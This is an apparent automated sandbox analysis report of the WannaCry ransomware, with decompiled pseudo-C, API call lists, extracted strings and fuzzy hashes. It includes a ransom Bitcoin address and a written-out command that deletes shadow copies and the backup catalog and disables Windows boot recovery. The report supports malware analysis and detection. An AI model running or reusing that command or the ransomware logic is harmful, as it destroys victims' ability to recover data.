                                                      					asm("repne scasb");
                                                      					_t165 = "13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94";
                                                      					_t82 = memcpy(_t165 + 0x175b75a, _t165, memcpy(_t90 + 0x5be, _t165, 0 << 2) & 0x00000003);
                                                      					 *((intOrPtr*)(_t90 + 0x584)) = 0x43960000;
                                                      					 *(_t90 + 0x588) = 0;
                                                      					__imp__time(0);
                                                      					 *(_t90 + 0x578) = _t82;
                                                      					E00401A10(_t167, 0);
                                                      					_t171 = _t171 + 0x30;
                                                      				}
                                                      				_t50 = E00402C40();
                                                      				__imp__#115(0x202,  &_v1424); // executed
                                                      				__imp____p___argc();
                                                      				if( *_t50 > 1) {
                                                      					_t168 = __imp____p___argv;
                                                      					_t140 = "fi";
                                                      					_t161 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      					while(1) {
                                                      						_t98 =  *_t161;
                                                      						_t60 = _t98;
                                                      						if(_t98 !=  *_t140) {
                                                      							break;
                                                      						}
                                                      						if(_t60 == 0) {
                                                      							L12:
                                                      							_t60 = 0;
                                                      						} else {
                                                      							_t136 =  *((intOrPtr*)(_t161 + 1));
                                                      							_t22 = _t140 + 1; // 0x31000069
                                                      							_t60 = _t136;
                                                      							if(_t136 !=  *_t22) {
                                                      								break;
                                                      							} else {
                                                      								_t161 = _t161 + 2;
                                                      								_t140 = _t140 + 2;
                                                      								if(_t60 != 0) {
                                                      									continue;
                                                      								} else {
                                                      									goto L12;
                                                      								}
                                                      							}
                                                      						}
                                                      						L14:
                                                      						if(_t60 == 0) {
                                                      							E00407F80(_t90);
                                                      							ExitProcess(0);
                                                      						}
                                                      						_t141 = "co";
                                                      						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      						while(1) {
                                                      							_t99 =  *_t162;
                                                      							_t63 = _t99;
                                                      							if(_t99 !=  *_t141) {
                                                      								break;
                                                      							}
                                                      							if(_t63 == 0) {
                                                      								L21:
                                                      								_t63 = 0;
                                                      							} else {
                                                      								_t135 =  *((intOrPtr*)(_t162 + 1));
                                                      								_t25 = _t141 + 1; // 0x6600006f
                                                      								_t63 = _t135;
                                                      								if(_t135 !=  *_t25) {
                                                      									break;
                                                      								} else {
                                                      									_t162 = _t162 + 2;
                                                      									_t141 = _t141 + 2;
                                                      									if(_t63 != 0) {
                                                      										continue;
                                                      									} else {
                                                      										goto L21;
                                                      									}
                                                      								}
                                                      							}
                                                      							L23:
                                                      							if(_t63 == 0) {
                                                      								E004080C0(_t90);
                                                      								ExitProcess(0);
                                                      							}
                                                      							_t142 = "vs";
                                                      							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
                                                      							while(1) {
                                                      								_t100 =  *_t163;
                                                      								_t66 = _t100;
                                                      								if(_t100 !=  *_t142) {
                                                      									break;
                                                      								}
                                                      								if(_t66 == 0) {
                                                      									L30:
                                                      									_t66 = 0;
                                                      								} else {
                                                      									_t134 =  *((intOrPtr*)(_t163 + 1));
                                                      									_t28 = _t142 + 1; // 0x63000073
                                                      									_t66 = _t134;
                                                      									if(_t134 !=  *_t28) {
                                                      										break;
                                                      									} else {
                                                      										_t163 = _t163 + 2;
                                                      										_t142 = _t142 + 2;
                                                      										if(_t66 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											goto L30;
                                                      										}
                                                      									}
                                                      								}
                                                      								L32:
                                                      								if(_t66 == 0) {
                                                      									Sleep(0x2710); // executed
                                                      									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
                                                      									_t70 = "cmd.exe"; // 0x2e646d63
                                                      									_t105 =  *0x420fd4; // 0x657865
                                                      									_v2724 = _t70;
                                                      									_v2720 = _t105;
                                                      									if(E00401BB0() != 0) {
                                                      										_push( &_v2456);
                                                      										_push( &_v2724);
                                                      										sprintf( &_v1032, "%s %s");
                                                      										E00401A90( &_v1032, 0, 0);
                                                      									} else {
                                                      										E00401B50( &_v2724,  &_v2456, _t71);
                                                      									}
                                                      									ExitProcess(0); // executed
                                                      								}
                                                      								goto L37;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L32;
                                                      						}
                                                      						asm("sbb eax, eax");
                                                      						asm("sbb eax, 0xffffffff");
                                                      						goto L23;
                                                      					}
                                                      					asm("sbb eax, eax");
                                                      					asm("sbb eax, 0xffffffff");
                                                      					goto L14;
                                                      				}
                                                      				L37:
                                                      				E00407E80();
                                                      				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
                                                      				E00406F80(_t90, _t201);
                                                      				E00406C20(_t90);
                                                      				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
                                                      				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
                                                      				 *0x42189c = _t90;
                                                      				return 1;
                                                      			}

                                                      APIs
                                                      • #4710.MFC42 ref: 004064DC
                                                      • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
                                                      • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
                                                        • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
                                                        • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                        • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                        • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                        • Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
                                                      • strrchr.MSVCRT ref: 00406554
                                                      • strrchr.MSVCRT ref: 00406564
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
                                                      • time.MSVCRT ref: 004065D1
                                                      • __p___argc.MSVCRT(00000202,?), ref: 004065FA
                                                      • __p___argv.MSVCRT ref: 0040661A
                                                      • ExitProcess.KERNEL32 ref: 0040665B
                                                      • __p___argv.MSVCRT ref: 00406666
                                                      • ExitProcess.KERNEL32 ref: 004066A7
                                                      • __p___argv.MSVCRT ref: 004066B2
                                                      • Sleep.KERNELBASE(00002710), ref: 004066F3
                                                      • sprintf.MSVCRT ref: 0040676A
                                                      • ExitProcess.KERNEL32 ref: 00406786
                                                      • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
                                                      • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
                                                      Strings
                                                      • %s %s, xrefs: 00406764
                                                      • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
                                                      • cmd.exe, xrefs: 0040671C
                                                      • Wana Decrypt0r 2.0, xrefs: 00406796
                                                      • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
                                                      • String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
                                                      • API String ID: 623806192-606506946
                                                      • Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
                                                      • Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
                                                      • Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v44;
                                                      				struct HINSTANCE__* _t82;
                                                      				struct HICON__* _t83;
                                                      				intOrPtr _t119;
                                                      				intOrPtr _t124;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E0B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t124;
                                                      				_push(__ecx);
                                                      				_t119 = __ecx;
                                                      				_push(_a4);
                                                      				_push(0x66);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
                                                      				_v12 = 1;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
                                                      				_v12 = 2;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
                                                      				_v12 = 3;
                                                      				E004085C0(__ecx + 0x120);
                                                      				_v12 = 4;
                                                      				E004085C0(__ecx + 0x1a4);
                                                      				_v12 = 5;
                                                      				E00404090(__ecx + 0x228);
                                                      				_v12 = 6;
                                                      				E00404090(__ecx + 0x290);
                                                      				_v12 = 7;
                                                      				E00404090(__ecx + 0x2f8);
                                                      				_v12 = 8;
                                                      				E00404090(__ecx + 0x360);
                                                      				_v12 = 9;
                                                      				E00405000(__ecx + 0x3c8);
                                                      				_v12 = 0xa;
                                                      				E00405000(__ecx + 0x444);
                                                      				_v12 = 0xb;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
                                                      				_v12 = 0xc;
                                                      				L00412DA6();
                                                      				_v12 = 0xd;
                                                      				L00412DA6();
                                                      				_v12 = 0xe;
                                                      				L00412DA6();
                                                      				_v12 = 0xf;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x834)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x844)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x854)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x864)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x874)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x884)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
                                                      				_v12 = 0x1b;
                                                      				_t82 = E00407640(__ecx + 0x888);
                                                      				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
                                                      				 *((intOrPtr*)(__ecx + 0x894)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v12 = 0x1d;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4163a0;
                                                      				L00412DA0();
                                                      				_push(0x421798);
                                                      				L00412DA0();
                                                      				_push(0x421798);
                                                      				L00412DA0();
                                                      				L00412E5A();
                                                      				_push(0x80);
                                                      				_push(0xe);
                                                      				L00412F2C();
                                                      				_t83 = LoadIconA(_t82, 0x80); // executed
                                                      				_push(0x421798);
                                                      				 *(_t119 + 0x82c) = _t83;
                                                      				 *((intOrPtr*)(_t119 + 0x824)) = 0;
                                                      				 *((intOrPtr*)(_t119 + 0x828)) = 0;
                                                      				 *((intOrPtr*)(_t119 + 0x818)) = 0;
                                                      				L00412DA0();
                                                      				 *((intOrPtr*)(_t119 + 0x820)) = 0;
                                                      				 *[fs:0x0] = _v44;
                                                      				return _t119;
                                                      			}

                                                      0x00406299
                                                      0x0040629f
                                                      0x004062a5
                                                      0x004062ab
                                                      0x004062b1
                                                      0x004062c1
                                                      0x004062c6
                                                      0x004062cb
                                                      0x004062d5
                                                      0x004062db
                                                      0x004062e5
                                                      0x004062ec
                                                      0x004062f1
                                                      0x004062f7
                                                      0x004062fc
                                                      0x00406303
                                                      0x00406308
                                                      0x00406313
                                                      0x00406318
                                                      0x0040631d
                                                      0x00406322
                                                      0x00406329
                                                      0x0040632f
                                                      0x00406335
                                                      0x00406340
                                                      0x00406346
                                                      0x0040634c
                                                      0x00406352
                                                      0x00406358
                                                      0x00406361
                                                      0x0040636d
                                                      0x00406377

                                                      APIs
                                                      • #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                      • #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                      • #567.MFC42(00000066,00000000), ref: 0040612F
                                                      • #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                        • Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                        • Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
                                                        • Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                        • Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
                                                        • Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667
                                                        • Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                        • Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                        • Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
                                                        • Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                        • Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                        • Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
                                                        • Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032
                                                      • #567.MFC42(00000066,00000000), ref: 004061DF
                                                      • #540.MFC42(00000066,00000000), ref: 004061F7
                                                      • #540.MFC42(00000066,00000000), ref: 00406209
                                                      • #540.MFC42(00000066,00000000), ref: 00406219
                                                      • #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #860.MFC42(00421798,00000066,00000000), ref: 004062F7
                                                      • #860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
                                                      • #860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
                                                      • #1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
                                                      • #1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
                                                      • LoadIconA.USER32(00000000,00000080), ref: 0040632F
                                                      • #860.MFC42(00421798), ref: 00406358
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
                                                      • String ID: 0ZA$0ZA$0ZA$DZA
                                                      • API String ID: 3237077636-3729005435
                                                      • Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
                                                      • Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
                                                      • Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E00405A60(void* __ecx) {
                                                      				char _v8;
                                                      				intOrPtr _v16;
                                                      				char _v24;
                                                      				char _v32;
                                                      				char _v40;
                                                      				char _v48;
                                                      				char _v56;
                                                      				char _v64;
                                                      				char _v72;
                                                      				char _v80;
                                                      				char _v88;
                                                      				char _v96;
                                                      				char _v104;
                                                      				char _v112;
                                                      				char _v120;
                                                      				void* _v140;
                                                      				void* _v928;
                                                      				void* _v932;
                                                      				void* _v936;
                                                      				void* _v1000;
                                                      				char _v1124;
                                                      				char _v1248;
                                                      				char _v1352;
                                                      				char _v1456;
                                                      				char _v1560;
                                                      				char _v1664;
                                                      				char _v1796;
                                                      				char _v1928;
                                                      				void* _v1992;
                                                      				void* _v2056;
                                                      				void* _v2120;
                                                      				char _v2212;
                                                      				char _v2216;
                                                      				intOrPtr _t144;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413A76);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t144;
                                                      				E0040B620(L"Wana Decrypt0r 2.0", 1);
                                                      				_push(0);
                                                      				L00412F08();
                                                      				L00412F02();
                                                      				L00412EFC();
                                                      				E004060E0( &_v2212, 0);
                                                      				_v8 = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
                                                      				L00412B72(); // executed
                                                      				_v8 = 0x1d;
                                                      				_v24 = 0x415a30;
                                                      				E00403F20( &_v24);
                                                      				_v8 = 0x1c;
                                                      				_v32 = 0x415a30;
                                                      				E00403F20( &_v32);
                                                      				_v8 = 0x1b;
                                                      				_v40 = 0x415a30;
                                                      				E00403F20( &_v40);
                                                      				_v8 = 0x1a;
                                                      				_v48 = 0x415a44;
                                                      				E00403F20( &_v48);
                                                      				_v8 = 0x19;
                                                      				_v56 = 0x415a44;
                                                      				E00403F20( &_v56);
                                                      				_v8 = 0x18;
                                                      				_v64 = 0x415a44;
                                                      				E00403F20( &_v64);
                                                      				_v8 = 0x17;
                                                      				_v72 = 0x415a44;
                                                      				E00403F20( &_v72);
                                                      				_v8 = 0x16;
                                                      				_v80 = 0x415a44;
                                                      				E00403F20( &_v80);
                                                      				_v8 = 0x15;
                                                      				_v88 = 0x415a44;
                                                      				E00403F20( &_v88);
                                                      				_v8 = 0x14;
                                                      				_v96 = 0x415a44;
                                                      				E00403F20( &_v96);
                                                      				_v8 = 0x13;
                                                      				_v104 = 0x415a44;
                                                      				E00403F20( &_v104);
                                                      				_v8 = 0x12;
                                                      				E00403F90( &_v112);
                                                      				_v8 = 0x11;
                                                      				E00403F90( &_v120);
                                                      				_v8 = 0x10;
                                                      				L00412CC2();
                                                      				_v8 = 0xf;
                                                      				L00412CC2();
                                                      				_v8 = 0xe;
                                                      				L00412CC2();
                                                      				_v8 = 0xd;
                                                      				L00412CC2();
                                                      				_v8 = 0xc;
                                                      				L00412EF6();
                                                      				_v8 = 0xb;
                                                      				E004050A0( &_v1124);
                                                      				_v8 = 0xa;
                                                      				E004050A0( &_v1248);
                                                      				_v8 = 9;
                                                      				E00404170( &_v1352);
                                                      				_v8 = 8;
                                                      				E00404170( &_v1456);
                                                      				_v8 = 7;
                                                      				E00404170( &_v1560);
                                                      				_v8 = 6;
                                                      				E00404170( &_v1664);
                                                      				_v8 = 5;
                                                      				E00405D90( &_v1796);
                                                      				_v8 = 4;
                                                      				E00405D90( &_v1928);
                                                      				_v8 = 3;
                                                      				L00412EF0();
                                                      				_v8 = 2;
                                                      				L00412EF0();
                                                      				_v8 = 1;
                                                      				L00412D4C();
                                                      				_v8 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v16;
                                                      				return 0;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                        • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                        • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                        • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                        • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                        • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                                        • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                                      • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                                      • #2621.MFC42 ref: 00405A96
                                                      • #6438.MFC42 ref: 00405A9B
                                                        • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #2514.MFC42 ref: 00405AC1
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                        • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                                      • #800.MFC42 ref: 00405C33
                                                      • #800.MFC42 ref: 00405C47
                                                      • #800.MFC42 ref: 00405C5B
                                                      • #800.MFC42 ref: 00405C6F
                                                      • #781.MFC42 ref: 00405C83
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42 ref: 00405D37
                                                      • #609.MFC42 ref: 00405D4B
                                                      • #616.MFC42 ref: 00405D5C
                                                      • #641.MFC42 ref: 00405D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                                      • API String ID: 3942368781-2594244635
                                                      • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                                      • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 129 407a90-407ab7 130 407bf4-407c28 #2385 129->130 131 407abd-407ac5 129->131 132 407ac7 131->132 133 407aca-407ad1 131->133 132->133 133->130 134 407ad7-407af9 call 404c40 #2514 133->134 137 407b72-407bef #2414 * 2 #800 #641 134->137 138 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 134->138 137->130 138->137
                                                      C-Code - Quality: 68%
                                                      			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				char _v4;
                                                      				char _v8;
                                                      				char _v20;
                                                      				intOrPtr _v24;
                                                      				char _v32;
                                                      				void* _v36;
                                                      				char _v44;
                                                      				char _v132;
                                                      				char* _v136;
                                                      				void* _v140;
                                                      				void* _v144;
                                                      				void* _v148;
                                                      				void* _v152;
                                                      				char _v160;
                                                      				intOrPtr _v164;
                                                      				char _v168;
                                                      				void* _v180;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t43;
                                                      				void* _t44;
                                                      				void* _t70;
                                                      				intOrPtr _t72;
                                                      				intOrPtr _t73;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413F17);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t72;
                                                      				_t73 = _t72 - 0x80;
                                                      				_t70 = __ecx;
                                                      				if(_a4 == 0x1388) {
                                                      					_t43 = __ecx + 0x2f8;
                                                      					if(_t43 != 0) {
                                                      						_t43 =  *((intOrPtr*)(_t43 + 0x20));
                                                      					}
                                                      					if(_a8 == _t43) {
                                                      						_t44 = E00404C40( &_v132, 0);
                                                      						_v8 = 0;
